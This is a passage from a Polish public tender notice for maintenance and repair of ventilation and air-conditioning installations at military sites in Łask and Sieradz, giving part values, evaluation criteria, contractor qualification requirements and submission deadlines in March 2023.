Klimor, DanPoltherm, VBW, Sinclair, Bard Maxa, Hidros, MDV, Chigo, Sinclair, Split. (32 BLT Łask, JW. 1551 Sieradz).<br/>2. Szczegółowy opis przedmiotu zamówienia i wykaz obiektów określa załączona do SWZ dokumentacja, składająca się z:<br/>2.1. Wykaz urządzeń podlegających konserwacji i naprawy - załącznik nr 9 do SWZ,<br/>2.2. Zakres konserwacji – załącznik nr 10 do SWZ,<br/>2.3. Harmonogram prac – załącznik nr 11 do SWZ.<br/>3. Przedmiot zamówienia obejmuje:<br/>3.1. konserwacje prowadzone według wytycznych zawartych w załącznikach, o których mowa w ust. 2 oraz we wzorze umowy stanowiącym załącznik nr 4 do SWZ;<br/>3.2. usuwanie awarii i naprawy urządzeń wskazanych w wykazie urządzeń (zał. nr 9 do SWZ) wg stawki roboczogodziny (zł) wskazanej w ofercie Wykonawcy na zasadach określonych w dokumentach zamówienia, w szczególności we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>4. Usługa musi odpowiadać wymaganiom Zamawiającego opisanym w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 213318,32 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W częściach 1 – 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria oraz wg wzorów w SWZ.<br/>Kryterium 1: Cena (brutto) Oferty - waga- 60 %, w tym:<br/>- podkryterium: cena usługi - waga 45%<br/>- podkryterium: wartość jednej roboczogodziny w zakresie usługi naprawy - waga 15%<br/>Kryterium 2: CR Czas (liczony w godzinach) Reakcji - waga-20 %<br/>Kryterium 3:CG Czas (liczony w miesiącach) Gwarancji- waga-20%<br/>Maksymalna liczba punktów CO + CR + CG= 100%=100 pkt<br/><br/>Kryterium „Cena Oferty” (CO) – 60% (na cenę oferty składa się cena usługi i cena jednej roboczogodziny).<br/>Cena oferty (CO) w powyższym kryterium zawiera:<br/>A. CENĘ USŁUGI (CU) tzn. łączna cena brutto za usługę konserwacji wg pozycji w formularzu cenowym (złącznik nr 3 do SWZ) za każdą część zamówienia;<br/>B. CENĘ ROBOCZOGODZINY (CR) tzn. cenę za jedną godzinę robocizny brutto w przypadku wykonywania usługi naprawy wg oferty Wykonawcy w formularzu ofertowym (załącznik nr 1 do SWZ) za każdą część zamówienia.<br/><br/>Kryterium – czas reakcji – CR – 20 %<br/>Zamawiający stawia warunek, iż Wykonawca zachowa gotowość przystąpienia do realizacji przedmiotu umowy przez 7 dni w tygodniu, po wcześniejszym otrzymaniu zgłoszenia o awarii dowolnego urządzenia stanowiącego przedmiot umowy w czasie min. 2 godz. i maksymalnie 24 godz. od momentu otrzymania zgłoszenia.<br/><br/>Kryterium – czas gwarancji – CG – 20 %<br/>Czas gwarancji to oferowana przez Wykonawcę gwarancja na wszystkie wykonywane prace związane z konserwacją, naprawa, usuwaniem uszkodzeń lub awarii w tym na zamontowane nowe części i elementy instalacji dla każdej z części zamówienia, na którą ofertę składa Wykonawca.<br/><br/>Oferta, która otrzyma najwięcej punktów w powyższych kryteriach: CO + CR + CG zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na konserwacji i naprawach urządzeń i instalacji: wentylacji, klimatyzacji, nawilżania i osuszania powietrza z podziałem na części:<br/>Część 4 – Instalacje Wentylacji – VTS Clima, Ventus, Inwent, urządzenie osuszania powietrza (JW.1551 Sieradz).<br/>2. Szczegółowy opis przedmiotu zamówienia i wykaz obiektów określa załączona do SWZ dokumentacja, składająca się z:<br/>2.1. Wykaz urządzeń podlegających konserwacji i naprawy - załącznik nr 9 do SWZ,<br/>2.2. Zakres konserwacji – załącznik nr 10 do SWZ,<br/>2.3. Harmonogram prac – załącznik nr 11 do SWZ.<br/>3. Przedmiot zamówienia obejmuje:<br/>3.1. konserwacje prowadzone według wytycznych zawartych w załącznikach, o których mowa w ust. 2 oraz we wzorze umowy stanowiącym załącznik nr 4 do SWZ;<br/>3.2. usuwanie awarii i naprawy urządzeń wskazanych w wykazie urządzeń (zał. nr 9 do SWZ) wg stawki roboczogodziny (zł) wskazanej w ofercie Wykonawcy na zasadach określonych w dokumentach zamówienia, w szczególności we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>4. Usługa musi odpowiadać wymaganiom Zamawiającego opisanym w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20674,37 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W częściach 1 – 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria oraz wg wzorów w SWZ.<br/>Kryterium 1: Cena (brutto) Oferty - waga- 60 %, w tym:<br/>- podkryterium: cena usługi - waga 45%<br/>- podkryterium: wartość jednej roboczogodziny w zakresie usługi naprawy - waga 15%<br/>Kryterium 2: CR Czas (liczony w godzinach) Reakcji - waga-20 %<br/>Kryterium 3:CG Czas (liczony w miesiącach) Gwarancji- waga-20%<br/>Maksymalna liczba punktów CO + CR + CG= 100%=100 pkt<br/><br/>Kryterium „Cena Oferty” (CO) – 60% (na cenę oferty składa się cena usługi i cena jednej roboczogodziny).<br/>Cena oferty (CO) w powyższym kryterium zawiera:<br/>A. CENĘ USŁUGI (CU) tzn. łączna cena brutto za usługę konserwacji wg pozycji w formularzu cenowym (złącznik nr 3 do SWZ) za każdą część zamówienia;<br/>B. CENĘ ROBOCZOGODZINY (CR) tzn. cenę za jedną godzinę robocizny brutto w przypadku wykonywania usługi naprawy wg oferty Wykonawcy w formularzu ofertowym (załącznik nr 1 do SWZ) za każdą część zamówienia.<br/><br/>Kryterium – czas reakcji – CR – 20 %<br/>Zamawiający stawia warunek, iż Wykonawca zachowa gotowość przystąpienia do realizacji przedmiotu umowy przez 7 dni w tygodniu, po wcześniejszym otrzymaniu zgłoszenia o awarii dowolnego urządzenia stanowiącego przedmiot umowy w czasie min. 2 godz. i maksymalnie 24 godz. od momentu otrzymania zgłoszenia.<br/><br/>Kryterium – czas gwarancji – CG – 20 %<br/>Czas gwarancji to oferowana przez Wykonawcę gwarancja na wszystkie wykonywane prace związane z konserwacją, naprawa, usuwaniem uszkodzeń lub awarii w tym na zamontowane nowe części i elementy instalacji dla każdej z części zamówienia, na którą ofertę składa Wykonawca.<br/><br/>Oferta, która otrzyma najwięcej punktów w powyższych kryteriach: CO + CR + CG zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje:<br/>W części 1:<br/>4.1. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy − w tym okresie, należycie wykonał (lub w przypadku świadczeń powtarzających się lub ciągłych nadal wykonuje) co najmniej 1 usługę, polegającą na wykonywaniu usług w zakresie konserwacji instalacji wentylacji, o wartości brutto nie mniejszej niż 60 000,00 zł brutto, potwierdzoną dowodami, że zostały wykonane należycie (lub są wykonywane należycie);<br/>4.2. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował w okresie realizacji zamówienia co najmniej:<br/>4.2.1. 2 osobami skierowanymi do realizacji zamówienia, posiadającymi świadectwa kwalifikacyjne E uprawniające do zajmowania się eksploatacją<br/>urządzeń, sieci i instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV oraz zaświadczenie uprawniające do pracy na wysokości 3m;<br/>4.2.2. 1 osobą skierowaną do realizacji zamówienia posiadającą aktualny certyfikat FGAZ, wydany przez Urząd Dozoru Technicznego.<br/>Zamawiający dopuszcza łączenie uprawnień w zakresie pkt 4.2.1 i 4.2.2. (tj. skierowanie co najmniej dwóch osób, posiadających powyższe uprawnienia łącznie)<br/>W części 2:<br/>4.3. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował w okresie realizacji zamówienia co najmniej:<br/>4.3.1. 2 osobami skierowanymi do realizacji zamówienia, posiadającymi świadectwa kwalifikacyjne E uprawniające do zajmowania się eksploatacją urządzeń, sieci i instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV oraz zaświadczenie uprawniające do pracy na wysokości 3m;<br/>4.3.2. 1 osobą skierowaną do realizacji zamówienia, posiadającą aktualne szkolenie w zakresie obsługi systemów firmy SWEGON.<br/>Zamawiający dopuszcza łączenie uprawnień w zakresie pkt 4.3.1 i 4.3.2. (tj. skierowanie co najmniej dwóch osób, posiadających powyższe uprawnienia łącznie)<br/>W części 3:<br/>4.4. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy − w tym okresie, należycie wykonał (lub w przypadku świadczeń powtarzających się lub ciągłych nadal wykonuje) co najmniej 1 usługę, polegającą na wykonywaniu usług w zakresie konserwacji instalacji wentylacji, o wartości brutto nie mniejszej niż 80 000,00 zł brutto, potwierdzoną dowodami, że zostały wykonane należycie (lub są wykonywane należycie);<br/>4.5. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował w okresie realizacji zamówienia co najmniej:<br/>4.5.1. 1 osobą skierowanymi do realizacji zamówienia, posiadającymi świadectwo kwalifikacyjne E uprawniające do zajmowania się eksploatacją urządzeń, sieci i instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV oraz zaświadczenie uprawniające do pracy na wysokości 3m;<br/>4.5.2. 1 osobą skierowaną do realizacji zamówienia posiadającą aktualny certyfikat FGAZ, wydany przez Urząd Dozoru Technicznego;<br/>4.5.3. 1 osobą skierowaną do realizacji zamówienia posiadającą aktualne szkolenie w zakresie obsługi systemu firmy LG typu Muli V, RAC/CAC oprogramowanie LG do diagnozowania usterek na obiekcie nr 36.<br/>Zamawiający dopuszcza łączenie uprawnień w zakresie pkt 4.5.1, 4.5.2. i 4.5.3. (tj. skierowanie co najmniej 1 osoby, posiadającej powyższe uprawnienia łącznie)<br/>W części 4:<br/>4.6. Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował w okresie realizacji zamówienia co najmniej 1 osobą, posiadającą świadectwo kwalifikacyjne E uprawniające do zajmowania się eksploatacją urządzeń, sieci i instalacji elektroenergetycznych o napięciu nie wyższym niż 1 kV oraz zaświadczenie uprawniające do pracy na wysokości powyżej 3m.<br/>5. W przypadku składania oferty na dwie lub więcej części w postępowaniu:<br/>5.1. Zamawiający dopuszcza, by Wykonawca dysponował osobami, posiadającymi szkolenia/uprawnienia wymagane w zakresie różnych części przez 1 osobę, tj. jedna osoba może posiadać więcej niż jedno wymagane szkolenie/uprawnienie, o których mowa w ust. 4;<br/>5.2. Wykonawca winien wykazać się wymaganym doświadczeniem w realizacji usług, o których mowa w pkt 4.1. i 4.4 dla części 1 i 3 zamówienia odrębnie (tj. dwie usługi, każda na wymaganą dokumentami zamówienia kwotę).<br/>Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale 10. SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia, potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu. Dokument sporządza się według wzoru stanowiącego załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający w celu potwierdzenia spełniania warunków udziału w postępowaniu w wyznaczonym terminie (nie krótszym niż 5 dni) Zamawiający wezwie do złożenia podmiotowych środków dowodowych Wykonawcę, którego oferta będzie najkorzystniejsza. <br/><br/>W części 1:<br/>1. wykazu usług – wykonanych/wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert o wartości min. 60 000,00 zł brutto wraz z podaniem ich wartość, przedmiotu, dat wykonywania i podmiotów, na rzecz których usługa/i zostały wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie przy czym dowodami, o których mowa są referencje lub inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane/są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy;<br/>2. wykazu osób skierowanych wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, innych wymaganych dokumentami zamówienia<br/>informacjami, a także zakresu wykonywanych przez nich czynności oraz z informacją o podstawie dysponowania tymi osobami<br/>– według wzoru stanowiącego odpowiednio załącznik nr 8 i 7 do SWZ.<br/>– w odniesieniu do warunku określonego w rozdziale 6 pkt 4.1 i 4.2. SWZ (zdolność techniczna lub zawodowa).<br/>W części 2:<br/>1. wykazu osób skierowanych wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, innych wymaganych dokumentami zamówienia informacjami, a także zakresu wykonywanych przez nich czynności oraz z informacją o podstawie dysponowania tymi osobami<br/>– według wzoru stanowiącego załącznik nr 7 do SWZ.<br/>– w odniesieniu do warunku określonego w rozdziale 6 pkt 4.3 SWZ (zdolność techniczna lub zawodowa).<br/>W części 3:<br/>1. wykazu usług – wykonanych/wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert o wartości min. 80 000,00 zł brutto wraz z podaniem ich wartość, przedmiotu, dat wykonywania i podmiotów, na rzecz których usługa/i zostały wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie przy czym dowodami, o których mowa są referencje lub inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane/są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy;<br/>2.wykazu osób skierowanych wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, innych wymaganych dokumentami zamówienia informacjami, a także zakresu wykonywanych przez nich czynności oraz z informacją o podstawie dysponowania tymi osobami<br/>– według wzoru stanowiącego odpowiednio załącznik nr 8 i 7 do SWZ<br/>– w odniesieniu do warunku określonego w rozdziale 6 pkt 4.4. i 4.5. SWZ (zdolność techniczna lub zawodowa).<br/>W części 4:<br/>1. wykazu osób skierowanych wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, innych wymaganych dokumentami zamówienia informacjami, a także zakresu wykonywanych przez nich czynności oraz z informacją o podstawie dysponowania tymi osobami<br/>– według wzoru stanowiącego załącznik nr 7 do SWZ.<br/>– w odniesieniu do warunku określonego w rozdziale 6 pkt 4.6. SWZ (zdolność techniczna lub zawodowa).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Wykonawca składa wraz z ofertą następujące dokumenty i załączniki:<br/>1.1. formularz ofertowy wypełniony i podpisany przez Wykonawcę zgodnie ze wzorem – załącznik nr 1 do SWZ;<br/>1.2. oświadczenie stanowiące potwierdzenie, że Wykonawca nie podlega wykluczeniu i spełnia warunki udziału w postępowaniu przygotowany zgodnie ze wzorem – załącznik nr 2 do SWZ;<br/>1.3. oświadczenie, stanowiące załącznik nr 2 do SWZ (jeśli dotyczy) składają także odrębnie:<br/>1.3.1. każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia; w takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>1.3.2. podmiot udostępniający, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu, w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy;<br/>1.4. formularz cenowy sporządzony z wykorzystaniem wzoru – załącznik nr 3 do SWZ;<br/>1.5. pełnomocnictwo osób podpisujących ofertę, o ile nie wynika z przepisów prawa lub innych dokumentów (jeśli dotyczy);<br/>1.5.1. pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy).<br/>1.6. zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 5 do SWZ - jeśli dotyczy.<br/>1.7. oświadczenia Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 6 do SWZ - jeśli dotyczy.<br/>2. Oferta powinna być sporządzona w języku polskim. Jeżeli dokumenty składane wraz z ofertą są wystawione w języku obcym, Wykonawca załącza ich tłumaczenie.<br/>3. Treść i forma złożenia oferty musi odpowiadać warunkom zamówienia, określonym przez Zamawiającego w niniejszym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu lub reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Powyższe dotyczy także wspólników spółki cywilnej.<br/>2. Oświadczenia potwierdzające brak podstaw wykluczenia i spełnienia warunków udziału w postępowaniu – załącznik nr 2 do SWZ każdy z Wykonawców składa osobno.<br/>3. Jeżeli oferta Wykonawców, o których mowa w niniejszym rozdziale zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego w sposób i na warunkach określonych w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Otwarcie ofert nastąpi poprzez odszyfrowanie plików złożonych poprzez Portal e-Usług SmartPZP. Zamawiający nie przewiduje publicznego otwarcia ofert.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">0</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zgodnie z art. 118-123 ustawy Pzp, Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2. Zamawiający nie nakłada obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy/podwykonawcom.<br/>3. Zamawiający wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp. Zamawiający działając na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) zw. dalej s.r.z.p.w.a.U. wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia określone w art. 7 ust. 1 tej ustawy. Na potwierdzenie braku opisanych w art. 7 ustawy podstaw wykluczenia Wykonawca obowiązany jest złożyć wraz z ofertą oświadczenie odpowiadające treścią załącznikowi nr 2 do SWZ.<br/>4. Postanowienia w sprawie dokumentów zastrzeżonych:<br/>- Wszystkie dokumenty złożone w prowadzonym postępowaniu są jawne, za wyjątkiem informacji zastrzeżonych na podstawie art. 18 ust. 3 ustawy Pzp przez składającego ofertę.<br/>- Dokumenty zastrzeżone Wykonawca wydziela (umieszczając je w osobnym pliku) i oznacza jako „TAJEMNICA PRZEDSIĘBIORSTWA”. Brak jednoznacznego wskazania, które informacje stanowią tajemnicę przedsiębiorstwa oznacza, że wszelkie składane oświadczenia i przedłożone dokumenty są jawne bez zastrzeżeń.<br/>5. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, profilu zaufanego lub podpisu osobistego (warstwa elektroniczna na dowodzie osobistym, tzw. e-dowód). Portal e-Usług SmartPZP jest kompatybilny ze wszystkimi podpisami elektronicznymi.<br/>6. Każdy Wykonawca samodzielnie lub jako Wykonawca wspólnie ubiegający się o zamówienie ma prawo złożyć tylko jedną ofertę. Dopuszczalne jest wycofanie oferty lub jej zmiana przed upływem terminu składania ofert.<br/>7. Oferta winna być sporządzona w sposób czytelny (zaleca się sporządzenie oferty na urządzeniu elektronicznym), a pliki składające się na ofertę Wykonawca winien odpowiednio opisać, by ułatwić ich identyfikację.<br/>8. Kryteria oceny ofert wraz z informacją na temat sposobu ich wyliczenia oraz wartości brutto oferty zawarte są w SWZ.<br/>9.Poprzez Portal e-Usług SmartPZP, Zamawiający będzie przekazywał wezwania i zawiadomienia, informacje, odpowiedzi na pytania w ramach postępowania, itp. W trakcie procedowania postępowania Wykonawca jest zobowiązany do utrzymywania kontaktu z Zamawiającym w sprawie wyjaśnień w zakresie złożonej oferty. Co więcej, Wykonawca ma obowiązek śledzić powiadomienia w skrzynce odbiorczej swojego konta na Portalu SmartPZP.<br/>10. W sytuacji awarii Systemu Platformy SmartPzp, niedostępności Systemu lub trudności związanych z jego użytkowaniem, uniemożliwiających prawidłową lub/i skuteczną 